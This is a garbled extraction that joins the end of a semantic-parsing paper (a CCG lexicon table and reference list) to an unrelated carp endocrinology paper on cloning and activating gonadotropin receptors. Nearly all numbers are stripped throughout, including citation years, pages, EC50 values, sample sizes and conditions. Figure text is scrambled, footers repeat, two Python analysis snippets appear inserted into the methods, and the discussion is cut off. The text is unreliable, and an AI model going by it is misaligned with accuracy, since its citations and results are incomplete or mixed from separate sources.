table : rules used to classify words into semantic classes. * represents a wild card expression which matches anything. lexx denotes the lexicalised form of x e.g., when state : npx/npx : λpλx.lexx.state(x) ∧ p(x) is applied to capital : np : λy.capital(y), the lexicalised form of x becomes capital, and therefore the predicate lexx.state becomes capital.state. the resulting semantic parse after application is λx.capital.state(x) ∧ capital(x).

lemma | pos | semantic class | semantic category
* | vb*, in, to, pos | event | directed : (se\npx< >)/npy< > : λqλpλe.∃x∃y. directed.arg (e,x) ∧ directed.arg (e,y) ∧ p(x) ∧ q(y)
* | nn, nns | type | movie : np : λx.movie(x)
* | nnp*, prp* | entity | obama : np : λx.equal(x,obama)
* | rb* | eventmod | annually : se\se : λpλe.lexe.annually(e) ∧ p(e)
* | jj* | typemod | state : npx/npx : λpλx.lexx.state(x) ∧ p(x)
be | * | copula | be : (sy\npx)/npy : λqλpλy.∃x.lexy(x) ∧ p(x) ∧ q(y)
the | * | unique | the : npx/npx : λpλx.unique(x) ∧ p(x)
* | cd | count | twenty : nx/nx : λpλx.count(x, ) ∧ p(x); twenty : nx/nx : λpλx.equal(x, ) ∧ p(x)
not, n't | * | negation | not : (se\npx)/(se\npx) : λpλqλe.∃x.negation(e) ∧ p(x,e) ∧ q(x)
no | * | complement | no : npx/nx : λpλx.complement(x) ∧ p(x)
* | wdt, wp*, wrb | question | what : s[wq]e/(s[dcl]e\npx) : λpλe.∃x.target(x) ∧ p(x,e)
* | wdt, wp*, wrb | closed | which : (npx\npx)/(s[dcl]e\npx) : λpλqλx.∃e.p(x,e) ∧ q(x)

acknowledgements
we are grateful to the anonymous reviewers for their valuable feedback on an earlier version of this paper. thanks to mike lewis and the members of ilcc for helpful discussions and comments. we acknowledge the support of eu erc advanced fellowship gramplus and eu ist cognitive systems ip ec-fp - “xperience”.

references
artzi, yoav and luke zettlemoyer. . bootstrapping semantic parsers from conversations.
in proceedings of the conference on empirical methods in natural language processing. edin- burgh, scotland, pages – . artzi, yoav and luke zettlemoyer. . weakly su- pervised learning of semantic parsers for mapping instructions to actions. transations of the associ- ation for computational linguistics ( ): – . banarescu, laura, claire bonial, shu cai, madalina georgescu, kira griffitt, ulf hermjakob, kevin knight, philipp koehn, martha palmer, and nathan schneider. . abstract meaning repre- sentation for sembanking. in proceedings of the th linguistic annotation workshop and interop- erability with discourse. sofia, bulgaria, pages – . berant, jonathan, andrew chou, roy frostig, and percy liang. . semantic parsing on freebase from question-answer pairs. in proceedings of the conference on empirical methods in nat- ural language processing. seattle, washington, usa, pages – . berant, jonathan and percy liang. . seman- tic parsing via paraphrasing. in proceedings of the nd annual meeting of the association for computational linguistics. baltimore, maryland, usa, pages – . bos, johan, stephen clark, mark steedman, james r. curran, and julia hockenmaier. . wide-coverage semantic representations from a ccg parser. in proceedings of coling . geneva, switzerland, pages – . branavan, s.r.k., harr chen, luke zettlemoyer, and regina barzilay. . reinforcement learn- ing for mapping instructions to actions. in pro- ceedings of the joint conference of the th an- nual meeting of the acl and the th international joint conference on natural language process- ing of the afnlp. suntec, singapore, pages – . branavan, s.r.k., nate kushman, tao lei, and regina barzilay. . learning high-level plan- ning from text. in proceedings of the th an- nual meeting of the association for computa- tional linguistics. jeju island, korea, pages – . cai, qingqing and alexander yates. . large- scale semantic parsing via schema matching and lexicon extension. in proceedings of the st annual meeting of the association for compu- tational linguistics. sofia, bulgaria, pages – . chen, david l. and raymond j. mooney. . learning to interpret natural language navigation instructions from observations. in proceedings of the th aaai conference on artificial intelli- gence. san francisco, california, pages – . clark, stephen and james r curran. . pars- ing the wsj using ccg and log-linear models. in proceedings of the nd annual meeting on asso- ciation for computational linguistics. barcelona, spain, pages – . clark, stephen and james r curran. . wide- coverage efficient statistical parsing with ccg and log-linear models. computational linguistics ( ): – . clark, stephen, julia hockenmaier, and mark steed- man. . building deep dependency structures with a wide-coverage ccg parser. in proceed- ings of the th annual meeting on association for computational linguistics. pages – . clarke, james, dan goldwasser, ming-wei chang, and dan roth. . driving semantic parsing from the world’s response. in proceedings of the th conference on natural language learning. uppsala, sweden, pages – . collins, michael. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in proceedings of the conference on empir- ical methods in natural language processing. philadelphia, pennsylvania, pages – . fader, anthony, luke zettlemoyer, and oren et- zioni. . paraphrase-driven learning for open question answering. in proceedings of the st annual meeting of the association for computa- tional linguistics. 
sofia, bulgaria, pages – . gabrilovich, evgeniy, michael ringgaard, and amarnag subramanya. . facc : freebase annotation of clueweb corpora, version (re- lease date - - , format version , correc- tion level ). goldwasser, dan, roi reichart, james clarke, and dan roth. . confidence driven unsupervised semantic parsing. in proceedings of the th annual meeting of the association for compu- tational linguistics: human language technolo- gies. portland, oregon, usa, pages – . goldwasser, dan and dan roth. . learning from natural instructions. in proceedings of the nd international joint conference on artificial intelligence. barcelona, spain, pages – . hoffmann, raphael, congle zhang, xiao ling, luke s zettlemoyer, and daniel s weld. . knowledge-based weak supervision for informa- tion extraction of overlapping relations. in pro- ceedings of the th annual meeting of the as- sociation for computational linguistics: human language technologies. portland, oregon, usa, pages – . krishnamurthy, jayant and thomas kollar. . jointly learning to parse and perceive: connect- ing natural language to the physical world. tran- sations of the association for computational lin- guistics ( ): – . krishnamurthy, jayant and tom mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learn- ing. jeju island, korea, pages – . kwiatkowski, tom, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on-the-fly ontology matching. in proceed- ings of the conference on empirical meth- ods in natural language processing. seattle, washington, usa, pages – . kwiatkowski, tom, luke zettlemoyer, sharon goldwater, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unification. in proceedings of the conference on empirical methods in natural language processing. pages – . lewis, mike and mark steedman. . combined distributional and logical semantics. transactions of the association for computational linguistics : – . liang, percy, michael jordan, and dan klein. . learning dependency-based compositional se- mantics. in proceedings of the th annual meet- ing of the association for computational linguis- tics: human language technologies. portland, oregon, usa, pages – . matuszek, cynthia, nicholas fitzgerald, luke zettlemoyer, liefeng bo, and dieter fox. . a joint model of language and perception for grounded attribute learning. in proceedings of the th international conference on machine learn- ing. edinburgh, scotland, pages – . mintz, mike, steven bills, rion snow, and dan jurafsky. . distant supervision for relation extraction without labeled data. in proceedings of the joint conference of the th annual meet- ing of the association for computational linguis- tics and the th international joint conference on natural language processing of the asian fed- eration of natural language processing. pages – . parsons, terence. . events in the semantics of english. mit press, cambridge, ma. poon, hoifung. . grounded unsupervised se- mantic parsing. in proceedings of the st an- nual meeting of the association for computa- tional linguistics. sofia, bulgaria, pages – . riedel, sebastian, limin yao, andrew mccallum, and benjamin m marlin. . relation ex- traction with matrix factorization and universal schemas. 
in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies. atlanta, georgia, pages – . steedman, mark. . the syntactic process. the mit press. wong, yuk wah and raymond mooney. . learning synchronous grammars for semantic parsing with lambda calculus. in proceedings of the th annual meeting of the association of computational linguistics. prague, czech republic, pages – . yao, xuchen and benjamin van durme. . information extraction over structured data: question answering with freebase. in proceedings of the nd annual meeting of the association for computational linguistics. baltimore, maryland, usa, pages – . zelle, john m and raymond j mooney. . learning to parse database queries using inductive logic programming. in proceedings of the national conference on artificial intelligence. portland, oregon, pages – . zettlemoyer, luke and michael collins. . online learning of relaxed ccg grammars for parsing to logical form. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning. prague, czech republic, pages – . zettlemoyer, luke s. and michael collins. . learning to map sentences to logical form: structured classification with probabilistic categorial grammars. in proceedings of st conference in uncertainty in artificial intelligence. edinburgh, scotland, pages – .

ontogeny of the specificity of gonadotropin receptors and gene expression in carp

lian hollander-cohen, benjamin böhm, krist hausken and berta levavi-sivan
department of animal sciences, the robert h. smith faculty of agriculture, food, and environment, hebrew university of jerusalem, rehovot, israel
correspondence should be addressed to b levavi-sivan: berta.sivan@mail.huji.ac.il

abstract
the pituitary gonadotropins, luteinizing hormone (lh) and follicle-stimulating hormone (fsh), are the principal endocrine drivers of reproductive processes in the gonads of jawed vertebrates. canonically, fsh recruits and maintains selected ovarian follicles for maturation and lh induces the stages of germinal vesicle breakdown and ovulation. in mammals, lh and fsh specifically activate cognate g-protein-coupled receptors that affect the proteins involved in steroidogenesis, protein hormone synthesis, and gametogenesis. this dual-gonadotropin model also exists in some fish species, but not in all. in fact, due to their diverse number of species, extended number of ecological niches, and remarkably flexible reproductive strategies, fish are appropriate as models to understand the co-evolution of gonadotropins and their receptors. in this study, we cloned and characterized the expression profile over the final stages of ovarian maturation of carp (cyprinus carpio) lhcgr and fshr. expression of both gonadotropin receptors increased in the later stage of early vitellogenesis, suggesting that both lh and fsh play a role in the development of mature follicles. we additionally tested the activation of clhcgr and cfshr using homologous and heterologous recombinant gonadotropins in order to gain insight into an evolutionary model of permissive gonadotropin receptor function.
these data suggest that carp (cyprinus carpio) gonad development and maturation depends on a specific gonadotropin profile that does not reflect the temporally distinct dual-gonadotropin model observed in salmonids or mammals, and that permissive gonadotropin receptor activation is a specific feature of ostariophysi, not all teleosts.

key words: luteinizing hormone (lh), follicle-stimulating hormone (fsh), estradiol, ostariophysi, gpcr, dihydroxyprogesterone ( α, β, dihydroxy- -pregnen, -one; dhp)

introduction
the brain–pituitary–gonad axis is a signaling cascade of hormones and their receptors that regulates reproduction in all jawed vertebrates. a milieu of stimulatory and inhibitory neuropeptides throughout different nuclei of the brain culminates in a signal to the pituitary gland to release the gonadotropins (gths). the pituitary gths include follicle-stimulating hormone (fsh) and luteinizing hormone (lh), and together are responsible for gametogenesis, steroidogenesis, protein hormone synthesis, and ovulation throughout the time-sensitive process of gonad maturation. generally speaking, circulating fsh levels are higher during gonad development and maturation, and circulating lh levels rise during the final stages of maturation and ovulation ( ). gths are heterodimeric proteins belonging to the cysteine-knot family, each consisting of a common α-subunit and a functionally specific β-subunit that provides binding specificity to their cognate receptors ( ). fsh and lh exert their actions through the activation of specific g protein-coupled receptors (gpcrs) in the gonads. glycoprotein hormone receptors (gphrs) constitute subfamily a of the gpcrs and include the lh receptor (lhcgr), fsh receptor (fshr), and thyroid-stimulating hormone receptor (tshr). the gphrs are characterized by a large n-terminal extracellular domain (ecd) that contains several leucine-rich repeat motifs (lrrs) and a low complexity ‘hinge region‘ responsible for the selective and high-affinity binding of cognate hormones ( ). the gphrs canonically contain a seven transmembrane domain that undergoes a conformational change upon hormone binding to the ecd, revealing binding sites in the intracellular domain (id) for g-protein interactions and arrestin-dependent receptor desensitization ( ).

ostariophysi is the second-largest superorder of teleost fish and includes siluriformes (catfishes) and cyprinidae (carps). this group represents species, % of freshwater species and % of known global fish species, and can be found on all major continents. the common carp is considered to be one of the most important aquaculture species globally ( ), which is why we sought to characterize and study the gonadotropin receptors of this fish. we first cloned the cfshr and lhcgr and studied their expression profile throughout the annual reproductive cycle. we then aimed to study the specific role of each of the carp gonadotropins at the final stages of oocyte maturation.
we further studied the promiscuity of the cloned carp gthrs by stimulation with homologous and heterologous recombinant fish gonadotropins in an attempt to build an evolutionary model of gonadotropin specificity. the accumulated results are interpreted to identify if different piscine reproductive strategies are driven by or a result of permissive gonadotropin actions. materials and methods cloning of cfshr and clhcgr and phylogenetic analysis carp total rna extraction, synthesis of first cdna strand, pcr procedure and cloning into a pgemt easy vector were performed according to hollander et al. ( ) and biran et al. ( ). first- and second-strand cdna were synthesized by means of ′ and ′ race pcr protocol with the smart race cdna amplification kit (clontech). the complete sequence of the receptor cdnas were confirmed by sequence analysis of separate clones. to obtain the full length, we used start and stop primers for each receptor (table ). complete cdnas were translated into the respective proteins and aligned to sequences of other organisms (accession numbers detailed in supplementary table , see section on supplementary data given at the end of this article) using the muscle method in the mega program (molecular evolutionary genetics analysis, software version . . ). the evolutionary history was inferred by using the maximum likelihood method based on the jtt matrix-based model ( ). initial tree(s) for the heuristic search were obtained automatically by applying neighbor-join and bionj algorithms to a matrix of pairwise distances estimated using a jtt model, and then selecting the topology with superior log likelihood value. a discrete gamma distribution was used to model evolutionary rate differences among sites ( categories (+g, parameter = . )). the rate variation model allowed table  primers used for cloning carp gonadotropin receptors. primer position sequence ′– ′ use cfshr r gtccagaacgatggggccttcagctcc pcr/ ′ race cloning cfshr f cacaccagatgcattcaacc pcr cloning cfshr r gcggcttgaaaagagcactaggagg pcr/ ′ race cloning cfshr r gaaccagattagaacccgcaggaatg pcr/ ′ race cloning cfshr f ggccacctctgtctactctc pcr cloning cfshr start atggtcttg ttgatgatgc tg full cloning cfshr stop tcagtacacttgggtgatgtg full cloning clhcgr f gaacaaca aagagccgcg tgtgattc pcr cloning clhcgr r catccagcatagtggggccaaacgc pcr/ ′ race cloning clhcgr f ctgagcatctccaacactgg pcr cloning clhcgr r cagagtgaacgctgaacgagccacca pcr/ ′ race cloning clhcgr r ggaaagccccgacgttgaacagc pcr/ ′ race cloning clhcgr start tga agacaatacg ggaca atgctgag full cloning clhcgr stop cta cac cct ttg cat ctg tgg full cloning upm ctaatacgactcactataggggc ′ race cloning nupm aagcaagttggtatcaacgcagagt ′ race cloning ′-race cds aagcagtggtatcaacgcagagtac(t) vn ′ race cloning ′-race cds (t) vn ′ race cloning the position represents the location of the primer in the final sequence. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : for some sites to be evolutionarily invariable ([+i], . % sites). the bootstrap consensus tree was inferred from replicates. the analysis involved amino acid sequences. 
evolutionary analyses were conducted in mega ( ). structural modeling of cfshr and clhcgr three-dimensional models of clhcgr and cfshr were plotted using the i-tasser server ( , ) with the default i-tasser parameters. each receptor was divided into two domains; extracellular domain (nucleotides – for cfshr and – for clhcgr) and transmembrane domain which included the cytoplasmic domain (nucleotides – for cfshr and – for clhcgr). domain prediction was performed using phobius (http://phobius.sbc.su.se/). visualization and super positioning of the models were performed using swiss-pdb viewer (http://spdbv.vital-it. ch/). the position of each extracellular domain in relation to its transmembrane was decided arbitrarily. fish for the in vivo studies, common carp from the same long- term experiment previously published ( ) were used. in short, fish were reared in earthen fishponds in kibbutz dan (upper galilee, israel; ° ′n, ° ′e), under standard israeli aquaculture ( ). eight to ten female fish were sampled monthly from september until august . their body weight (bw) and gonad weight (gw) were measured for gonadosomatic index (gsi) calculations, blood was withdrawn from the caudal vessels, and pituitary and gonads were collected into rna later (life technologies). pituitaries were also collected into % ethanol for protein extraction and gonadal fragments were fixed in bouin’s fluid for histology ( ). pubertal stage of the fish gonads was determined according to histology ( , , , ). four stages were identified: i, primary growth (pg)+ previtellogenic (pv); ii, early vitellogenic (ev); iii, mid-vitellogenic (mv); and iv, mature follicles (mfs). for in vitro studies, fish (n = , bw = . ± . kg) were kept indoor in a recirculating system in l tanks at °c and a photoperiod of -h light. all experimental procedures complied with and were approved by the animal care and use guidelines of the hebrew university and were also approved by the local administrative panel on laboratory animal care (ag- - ). rna extraction and real-time pcr total rna was extracted from the gonads using trizol reagent (invitrogen) according to the manufacturer’s protocol, and integrity and quality of the purified rna samples were evaluated by gel electrophoresis and nanodrop, respectively. cdna was prepared as described previously ( ). to assess the relative expression of clhcgr and cfshr mrnas, mrna levels were normalized against the geometric mean of two endogenous reference genes, ef α and β-actin, using the comparative threshold cycle method (−∆ct). the mrna expression levels of both ef α and β-actin were stable among all stages of oogenesis in the carp (supplementary fig. ), as previously reported for tilapia ( ) and coho salmon ( ). the rt quantitative pcr procedure was as described previously ( , ). six serial dilutions ( : ) were prepared from a gonad cdna pool (n = fish), and the efficiencies of the specific gene amplifications were calculated by plotting ct versus log template. amplification was carried out in a lightcycler® system (roche), according to the manufacturer’s protocol. all qpcr products were purified and sequenced in order to confirm that the correct targets were amplified. validation of the rt-pcr: the dissociation curve analysis, absence of genomic dna and the reverse-transcriptase negative control, were conducted as described previously ( ). to improve presentation of results, the mean value of the primary growth (pg) stage was set to , so all normalized data are divided by the mean of this stage. 
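as a concrete illustration of this normalization step, the sketch below computes relative expression with the comparative threshold cycle (−∆ct) method against the geometric mean of the two reference genes and then scales the values so that the mean of the primary growth (pg) stage equals 1. the ct values, function names, and use of numpy are hypothetical and for illustration only; they are not the authors' data or code.

```python
import numpy as np

def relative_expression(ct_target, ct_ref1, ct_ref2):
    """Comparative threshold cycle (-dCt) expression of a target gene,
    normalized to the geometric mean of two reference genes
    (here assumed to be ef1a and beta-actin)."""
    ct_target = np.asarray(ct_target, dtype=float)
    # The geometric mean of the reference quantities 2**-Ct1 and 2**-Ct2
    # equals 2**-(arithmetic mean of the two reference Ct values).
    ct_ref = (np.asarray(ct_ref1, dtype=float) + np.asarray(ct_ref2, dtype=float)) / 2.0
    return 2.0 ** -(ct_target - ct_ref)

def fold_over_baseline(expression, stages, baseline="PG"):
    """Scale normalized expression so the mean of the baseline stage
    (primary growth, PG) equals 1."""
    expression = np.asarray(expression, dtype=float)
    stages = np.asarray(stages)
    return expression / expression[stages == baseline].mean()

# Hypothetical Ct values for four fish, for illustration only.
ct_fshr = [31.2, 30.8, 26.5, 24.9]
ct_ef1a = [18.1, 18.3, 18.0, 18.2]
ct_actb = [19.0, 18.8, 19.1, 18.9]
stages  = ["PG", "PG", "EV", "MF"]

expr = relative_expression(ct_fshr, ct_ef1a, ct_actb)
print(fold_over_baseline(expr, stages))
```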
tissue distribution of carp lhcgr and fshr tissue samples were collected from three male and three female carp at different reproduction stages. two micrograms of total rna were extracted from each of the following tissues: the caudal brain, front brain, mid-brain, pituitary gland, spleen, gills, kidneys, muscles, fat, ovaries/ testis, retina, heart, caudal and front intestines, and liver. cdna samples were prepared as described previously ( ). the tissue expression patterns of clhcgr and cfshr in the various tissues were analyzed by rt-pcr with the primer sets described in table . cos- reporter assays transient transfection, cell procedures, and stimulation protocols were generally performed as described previously ( , , ). briefly, cos- cells were grown in dmem until confluent. co-transfection of the receptors ( µg/plate for cfshr and . µg/plate for clh) and a camp- response element-luciferase (cre-luc) reporter plasmid (at µg/plate) was carried out with transit-x ® system (mirus). the cells were serum-starved for h, stimulated with various stimulants for h, and then harvested and this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://phobius.sbc.su.se/ http://spdbv.vital-it.ch/ http://spdbv.vital-it.ch/ https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : analyzed as described previously ( ). experiments were repeated a minimum of three times from independent transfections and each was performed in triplicate. recombinant gonadotropins used in this study recombinant lh and fsh from tilapia ( , ), sturgeon (acipenser gueldenstaedtii) ( ), and carp ( ) were produced as biologically active, single-chain polypeptides in the methylotrophic yeast, pichia pastoris. recombinant tfsh and tlh were able to stimulate the release of -ketotestosterone ( -kt) from the testes, or the release of estradiol (e ) from the ovaries of tilapia ( , ). recombinant stfsh and stlh were able to elicit the release of e and -kt from ovarian and testis fragments, respectively ( ). recombinant clh enhanced both e figure  maximum likelihood phylogenetic analysis of the lhcgr and fshr from different organisms, the numbers in each branch represents bootstrap percentage values from replicates. each order is highlighted in different color. accession numbers for organisms represented here are detailed in supplementary table . this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : and α, β, dihydroxy- -pregnen, -one (dhp) secretion, and increased spawning success and fertilization rate when injected to mature female carps in vivo ( ). isolation of carp ovarian follicles and steroid elisa ovaries were collected immediately upon killing the fish and incubated as described previously ( ). 
after rinsing, the medium was supplemented with either carp pituitary extract (cpe) or graded concentrations of homologous, recombinant clhβα and cfshβα ( , ). the follicles were cleared in sera solution (ethanol:formalin %:acetic acid; : : ) ( ), in order to determine the position of the germinal vesicle (gv) within the translucent oocyte. the number of oocytes at each stage was recorded: stage i: central gv; stage ii: eccentric gv; stage iii: migrating gv; stage iv: gv breakdown (gvbd) and stage v: ovulated eggs. evaluation was done under a microscope (olympus, cx ) with an image-analyzing device. e and dhp concentrations were analyzed by specific elisas ( , ). each experiment was performed on follicles harvested from the same female, and was repeated at least three times. all samples were analyzed in duplicate, and each elisa plate contained a standard curve. the lower limit of detection was . pg/ml for either e or dhp. the intra- and inter-assay coefficients of variation were less than and %, respectively. statistical analyses data are presented as means ± s.e.m. an unequal variance test was performed using jmp . software; in all data the variances of the samples were equal. the significance of differences between group means of expression levels was determined by anova, followed by tukey’s test using graphpad prism . software (san diego, ca, usa). to evaluate the correlation we used a pearson coefficient in the correlation parameter in prism. ec values of the receptors assays were calculated using log agonist versus response on a nonlinear regression curve using prism. results molecular cloning, tissue distribution, and d models of the carp gthrs the cloned cfshr cdna (genbank accession number mh ) is bp in length, containing an orf of bp that encodes a amino acid protein, while the cloned lhcgr cdna (genbank accession number mh ) is bp in length and encodes a protein of amino acids (supplementary fig. ). a putative n-terminal signal peptide of and amino acids were predicted for the fshr and lhcgr, respectively by signalp program analysis (http://www.cbs.dtu.dk/services/ signalp/). like all other gphrs, cfshr and clhcgr contain a very long n-terminal extracellular region ( and amino acids, respectively), a region consisting of seven transmembrane domains, and a c-terminal intracellular tail (supplementary fig. ). we examined a variety of tissues including the brain, pituitary, liver, intestine, spleen, fat, muscle, gills, retina, heart, kidney and gonads for the expression of cfshr and clhcgr. not surprisingly, both fshr and lhcgr were expressed at relatively high levels in the ovary and testis. interestingly, both receptors were expressed in the pituitary, possibly connected to feedback mechanisms. lhcgr was highly expressed in the male pituitary compared to fshr. the expression of lhcgr could be easily detected in the kidney, fat, spleen and gills, whereas fshr was expressed in the retina, gills and front brain (supplementary fig. ). the evolutionary relationship of the cfshr and clhcgr to homologous gphr sequences in other taxa was conducted by performing a phylogenetic analysis using the maximum likelihood method. the overall topology of the phylogenetic tree shows distinct lhcgr and fshr clades, each with highly supported branches for sarcopterygian (mammalian, bird and amphibian molecules) and actinopterygian (fish) lineages. 
both cfshr and clhcgr grouped with other species in the cypriniformes like zebrafish, grass carp, and rohu, and with different species of catfishes like the channel and north american catfish (fig. ). figure  three-dimensional models of the gonadotropin receptors that were calculated using the i-tasser server and were visualized using swis-spdv viewer. the extracellular domain is marked in red, the seven helices of the transmembrane domain are marked in blue, and the intracellular domain is colored green. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://www.cbs.dtu.dk/services/signalp/ http://www.cbs.dtu.dk/services/signalp/ https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : three-dimensional models of the carp gthrs were conducted using i-tasser. for each receptor the extracellular region and transmembrane region where modeled separately. the c-scores calculated by itasser for fshr where . and − . for the transmembrane and extracellular regions, respectively. for lhcgr the c-scores where − . and − . for the transmembrane and extracellular regions, respectively (fig. ). functional activation and characterization of carp fshr and lhcgr in order to test for the bioactivity of human and carp gthrs by cpe we transiently expressed each receptor (cfshr, clhcgr, hufshr or hulhcgr) in cos- cells, together with the reporter construct, pcre-luc. cpe more effectively activated clhcgr than cfshr in terms of maximal response and effective dose. the human gthrs were not activated by cpe (fig. ). we next aimed to test the response of the cloned cfshr and clhcgr by stimulating transfected cos- cells with various doses of single-chain cgths ( . – ng/ml). recombinant clh activated camp signaling via clhcgr in a dose-dependent manner (ec = . ng/ml). moreover, recombinant clh also activated cfshr in a dose-dependent manner (ec = . ng/ml), while cfsh activated only its cognate fsh-r (ec = . ng/ml). both gonadotropins activated cfshr with a similar ec and maximal response, while activation of cfshr was achieved mainly by clh (fig. and table ). to further characterize the novel cfshr and clhcgr, we tested the potential activation of intra- and inter- species gonadotropins. we used recombinant single- chain lh or fsh from a non-teleost russian sturgeon (acipenseriformes) ( ), carp (cypriniformes) ( ), a recently evolved teleost (nile tilapia), perciformes; oreochromis niloticus ( , ), or human fsh or chorionic gonadotropin (hcg). to better compare between the activity of each ligand and the different receptors we ignored the ec of ligands that did not activate the receptor in a maximal fold change higher than . (marked as n/a in table ). clhcgr-transfected cells responded to hcg, tlh and also tfsh, while cfshr-transfected cells responded only to hfsh and tfsh (fig. and table ). expression of ovarian fshr and lhcgr during sexual maturation in female carp we next aimed to study the expression levels of both cfshr and clhcgr throughout the reproductive cycle of the female carp in parallel to ovarian development. 
at the primary growth stage (pg, follicle diameter – µm) - - - - - - - cfshr clhcgr hulhcgr hufshr cpe [dilutions ( : )] lu ci fe ra se a ct iv ity (r at io to b as al ) figure  carp and human gonadotropin receptors stimulated cre-luc activity in response to cpe. cos- cells were transiently co-transfected with reporter plasmid pcre-luc and carp gonadotropin receptors (cfshr, clhcgr) or human gonadotropin receptors (hufshr, hulhcgr). cells were stimulated for  h with decimal dilutions of cpe. luciferase activity was determined and results are presented as a ratio to basal stimulation. each assay was repeated at least three times. data are presented as mean ± s.e.m. of a representative experiment, performed in triplicate. figure  carp gonadotropin receptors stimulated by carp (c) recombinant gonadotropins. cos- cells were transiently co-transfected with clhcgr (a) or cfshr (b) with the reporter plasmid pcre-luc. cells were stimulated for  h with graded concentrations of recombinant clh or cfsh. luciferase activity was determined and results are presented as a ratio to basal stimulation. each assay was repeated at least three times. data are presented as mean ± s.e.m. of a representative experiment, performed in triplicate. cfshr . . . . . . . log (gthng/ml)log (gthng/ml) lu ci fe ra se a ct iv ity (r at io to b as al ) lu ci fe ra se a ct iv ity (r at io to b as al ) a bclhcgr . . . . . . carprecfsh carpreclh this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : both fshr and lhcgr had extremely low levels of expression. the expression of fshr significantly increased during early vitellogenesis, until follicle maturation. in contrast, the expression of lhcgr increased more gradually, becoming significant only at the mid-vitellogenic stage with the highest expression in mature follicles (fig. ). relationships between pituitary mrna levels of pituitary gths, ovarian gth-rs, and gsi given the promiscuity of the gonadotropin receptors in the carp, it was interesting to test the correlation between mrna levels of the gonadotropin ligands vs mrna levels of the different gth-rs. clhcgr and cfshr mrna levels significantly correlated with each other throughout the reproductive cycle. gsi was also highly correlated to both clhcgr and cfshr mrna levels, while the mrna of lhb in the pituitary was correlated to the mrna levels of both gthrs in the ovary. however, pituitary mrna levels of fshb were significantly correlated only to ovarian cfshr (table ). in vitro effect of carp recombinant gths on gvbd of preovulatory follicles taking in account the promiscuity of the cgthrs, the next experiment was designed in order to answer the question whether cfsh and/or clh can induce gvbd. we recently showed that the pituitary content of the various gonadotropins in the carp pituitary differ dramatically, when cpe contained milligrams clh and only nanograms of cfsh ( ). thus, we used higher concentration of recombinant clh ( – ng/ml) than recombinant cfsh ( – ng/ml) in order to induce gvbd in vitro. 
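the ec50 values reported for the receptor activation assays come from nonlinear regression of log(agonist) versus response curves, as stated in the statistical analyses. purely to illustrate that kind of fit, here is a minimal sketch using a four-parameter logistic model in scipy rather than prism; the dose–response numbers are invented and the helper names are hypothetical, not the authors' actual data or code.

```python
import numpy as np
from scipy.optimize import curve_fit

def four_pl(log_dose, bottom, top, log_ec50, hill):
    """Four-parameter logistic curve: response as a function of log10(dose),
    the same shape as a 'log(agonist) vs. response, variable slope' fit."""
    return bottom + (top - bottom) / (1.0 + 10.0 ** ((log_ec50 - log_dose) * hill))

# Invented dose-response data: doses in ng/ml, response as fold change over basal.
doses = np.array([0.1, 0.3, 1.0, 3.0, 10.0, 30.0, 100.0, 300.0])
response = np.array([1.0, 1.1, 1.4, 2.2, 3.6, 4.5, 4.9, 5.0])

log_doses = np.log10(doses)
initial_guess = [response.min(), response.max(), np.median(log_doses), 1.0]
params, _ = curve_fit(four_pl, log_doses, response, p0=initial_guess, maxfev=10000)
bottom, top, log_ec50, hill = params
print(f"EC50 ~ {10 ** log_ec50:.2f} ng/ml, maximal fold change ~ {top:.2f}")
```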
interestingly, the maturational response significantly increased when increasing concentrations of both fsh and lh were used. although no significant difference in gvbd counts was evident in response to graded dilutions of cpe, a trend towards an increasing number of mature follicles was observed (fig. ). we further analyzed the steroid profile of the preovulatory follicles incubated with cpe or recombinant carp gonadotropins (fig. ). varying dilutions of cpe did not affect dhp or estradiol levels. increasing doses of cfsh significantly elevated dhp concentrations, and all the tested doses of cfsh decreased estradiol concentrations. high doses of recombinant clh significantly increased dhp, but estradiol showed only a negative trend with increasing recombinant clh.

[table: ec values (ng/ml) fit to a non-linear regression and the maximal response (fold change; max) of gth-stimulated carp gonadotropin receptors (cfshr, clhcgr) in receptor activation assays, for stimulation with cfsh, clh, tfsh, tlh, hcg, hfsh, stfsh and stlh. stimulants with a maximum fold change below the threshold or without a sigmoid response were considered inactive and represented with an n/a value.]

discussion
